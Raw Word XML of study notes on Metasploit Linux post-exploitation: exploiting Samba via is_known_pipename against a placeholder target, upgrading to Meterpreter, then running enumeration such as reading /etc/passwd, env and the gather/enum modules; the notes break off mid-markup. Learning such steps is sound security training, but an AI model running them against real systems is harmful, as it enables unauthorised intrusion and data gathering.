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BACA6" w14:textId="3902CE26" w:rsidR="00853ABF" w:rsidRPr="00BB1311" w:rsidRDefault="00557A50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB1311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux Post Exploitation Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB1311">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4097EE" w14:textId="77777777" w:rsidR="00557A50" w:rsidRDefault="00557A50"/>
    <w:p w14:paraId="454275FB" w14:textId="6508CBA4" w:rsidR="00557A50" w:rsidRDefault="00BB1311">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D7943CC" wp14:editId="40F02C8D">
            <wp:extent cx="5408140" cy="1812898"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1373603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603428" name="Picture 137360342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3687" cy="181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07724" w14:textId="77777777" w:rsidR="00BB1311" w:rsidRDefault="00BB1311"/>
    <w:p w14:paraId="4738479D" w14:textId="563FA7C2" w:rsidR="00BB1311" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Bash history file contains the commands that the user run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D9A1D" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="0209BB58" w14:textId="1376DFC7" w:rsidR="00653127" w:rsidRPr="00653127" w:rsidRDefault="00653127">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00653127">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CB79CF" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="362CF7F7" w14:textId="610B4C40" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F8BFCB3" w14:textId="2D23527E" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t xml:space="preserve">Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B54C1B" w14:textId="0C290940" w:rsidR="00653127" w:rsidRDefault="00492156">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00653127">
        <w:t>Sfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00653127">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC1614" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="5C487A00" w14:textId="1D1408F4" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux_mod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62696FCD" w14:textId="0F981BEE" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B98E614" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="33502C8C" w14:textId="63C6F92F" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6EDF17A9" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="1174E18B" w14:textId="42CD5DF4" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Search type: exploit samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D11B86" w14:textId="7992F77D" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE6EC3" w14:textId="376B465E" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA2E7B" w14:textId="203F2B6C" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C10A4B" w14:textId="2AC92B24" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the command shell session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549735FF" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="280B27D3" w14:textId="724482CC" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7AD04DC5" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="391B24E1" w14:textId="0C03690D" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Ctrl+z /background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679BE56B" w14:textId="77777777" w:rsidR="00653127" w:rsidRDefault="00653127"/>
    <w:p w14:paraId="0FBD4456" w14:textId="21316CC9" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD021CE" w14:textId="6326D61D" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Sessions -u 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8CF5AD" w14:textId="423CE54D" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>upgrade</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the session 1 to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06FAB46B" w14:textId="7C73EB82" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD6798" w14:textId="7BC8D48B" w:rsidR="00653127" w:rsidRDefault="00653127">
      <w:r>
        <w:t>Sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44B1FC" w14:textId="551261A7" w:rsidR="00653127" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>#meterpreter session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B23B75" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="2D2F57BC" w14:textId="5ECC01B8" w:rsidR="00653127" w:rsidRDefault="002A1262">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="31637EA9" w14:textId="0DA2D7E5" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F87D0D7" w14:textId="529ACDCB" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BFAD7C" w14:textId="1D23BC0E" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B12020D" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="3B31A1F4" w14:textId="0DB89AC6" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C78254D" w14:textId="1D5BD10C" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>identify</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> current users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074C873" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="1974B1F5" w14:textId="646420F6" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E629D34" w14:textId="17E519A9" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t xml:space="preserve"># to see various </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A043EB" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="2A4C7720" w14:textId="4293A9EC" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637A36A" w14:textId="05603219" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> current user is part of which group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEF28D5" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="03011454" w14:textId="1FAFA508" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/*issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B38D76B" w14:textId="5A743CF6" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t>#distribution release version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77462E3D" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="0012DBA1" w14:textId="66C12F6C" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FAA7F4" w14:textId="2B66583C" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t># kernel version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE6CA7" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="3EABC7F6" w14:textId="4F8F81B9" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E2BE4" w14:textId="5DF6A5BD" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t xml:space="preserve"># more additional info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA7584" w14:textId="74CADF13" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="210C7690" w14:textId="7763236C" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t xml:space="preserve">Ip a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DA975D" w14:textId="20D8012B" w:rsidR="002A1262" w:rsidRDefault="002A1262">
      <w:r>
        <w:t># list all the interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF81250" w14:textId="77777777" w:rsidR="002A1262" w:rsidRDefault="002A1262"/>
    <w:p w14:paraId="13342E5C" w14:textId="5EC9A8EC" w:rsidR="002A1262" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>Ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A52EEE2" w14:textId="3A1B820F" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t># list all the processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7AAD06" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRPr="00CD0407" w:rsidRDefault="00CD0407" w:rsidP="00CD0407">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> — list processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C7E6C" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRPr="00CD0407" w:rsidRDefault="00CD0407" w:rsidP="00CD0407">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t>  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> — show processes for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0407">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> users (not just your terminal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AB465" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRPr="00CD0407" w:rsidRDefault="00CD0407" w:rsidP="00CD0407">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t>  u</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> — show </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0407">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user-oriented</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> output (adds USER, %CPU, %MEM, VSZ, RSS, START, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62078B9D" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRPr="00CD0407" w:rsidRDefault="00CD0407" w:rsidP="00CD0407">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t>  x</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> — include processes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0407">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without a controlling terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC82A0" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="04CB0053" w14:textId="2E99056A" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>Env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0F2D88" w14:textId="31FC3DEF" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t># environment variable used by current users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0F1BF" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="019697FC" w14:textId="5EDA9A9C" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="11B8AB5A" w14:textId="56828C09" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7766B" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="4EE0B43D" w14:textId="0D17B8C4" w:rsidR="00CD0407" w:rsidRPr="00CD0407" w:rsidRDefault="00CD0407">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0407">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post exploitation modules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8F77E" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="4CA1737D" w14:textId="1ED334D2" w:rsidR="00CD0407" w:rsidRPr="003960CA" w:rsidRDefault="00CD0407">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="782588F9" w14:textId="5118B4A9" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>gather/</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0407">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_configs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4734B3" w14:textId="727B5626" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>gather</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68083B2E" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="51B379C3" w14:textId="394763C3" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6018D298" w14:textId="7351A8F6" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABAD743" w14:textId="3E5DBEA2" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634098EF" w14:textId="0C3DB4CD" w:rsidR="00CD0407" w:rsidRDefault="00CD0407">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="003960CA">
        <w:t>Show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all the configuration </w:t>
      </w:r>
      <w:r w:rsidR="003960CA">
        <w:t>files, if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="003960CA">
        <w:t>fails</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that means that config file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>doesnot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70B6C2" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="03674313" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="62B688DE" w14:textId="7BA3909D" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDEF8B9" w14:textId="676D9555" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lists and manages artifacts</w:t>
      </w:r>
      <w:r w:rsidRPr="003960CA">
        <w:t xml:space="preserve"> (files, credentials, screenshots, registry hives, etc.) that Metasploit modules or interactive sessions have collected and saved to the framework database / disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5660C864" w14:textId="77777777" w:rsidR="003960CA" w:rsidRDefault="003960CA"/>
    <w:p w14:paraId="64A8C1D7" w14:textId="7AB8C008" w:rsidR="003960CA" w:rsidRPr="003960CA" w:rsidRDefault="003960CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search env </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>platform:linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0B3E4F10" w14:textId="0B202A21" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Use(gather/env)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF535A7" w14:textId="5AB5B3DF" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F198D8C" w14:textId="5640ED5A" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A664A0A" w14:textId="493527AD" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7E5B5" w14:textId="77777777" w:rsidR="003960CA" w:rsidRDefault="003960CA"/>
    <w:p w14:paraId="4CB9018E" w14:textId="77777777" w:rsidR="003960CA" w:rsidRDefault="003960CA"/>
    <w:p w14:paraId="17871C08" w14:textId="77777777" w:rsidR="003960CA" w:rsidRDefault="003960CA"/>
    <w:p w14:paraId="1F3EACDF" w14:textId="77777777" w:rsidR="00CD0407" w:rsidRDefault="00CD0407"/>
    <w:p w14:paraId="27D2D36F" w14:textId="6AB10BE3" w:rsidR="00CD0407" w:rsidRPr="003960CA" w:rsidRDefault="003960CA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003960CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enum_network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D701BF2" w14:textId="7D25681C" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Use(gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum_network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72638F48" w14:textId="111CFDF2" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D31AB80" w14:textId="4D5DB2D1" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Set session id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404520E1" w14:textId="413B7424" w:rsidR="003960CA" w:rsidRDefault="003960CA">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD1679" w14:textId="77777777" w:rsidR="003960CA" w:rsidRDefault="003960CA"/>
    <w:p w14:paraId="17EF8466" w14:textId="416BB213" w:rsidR="002836A1" w:rsidRDefault="002836A1">
      <w:r>
        <w:t># security feature enabled on thew system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BED8A" w14:textId="405D4B55" w:rsidR="002836A1" w:rsidRPr="002836A1" w:rsidRDefault="002836A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002836A1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002836A1">
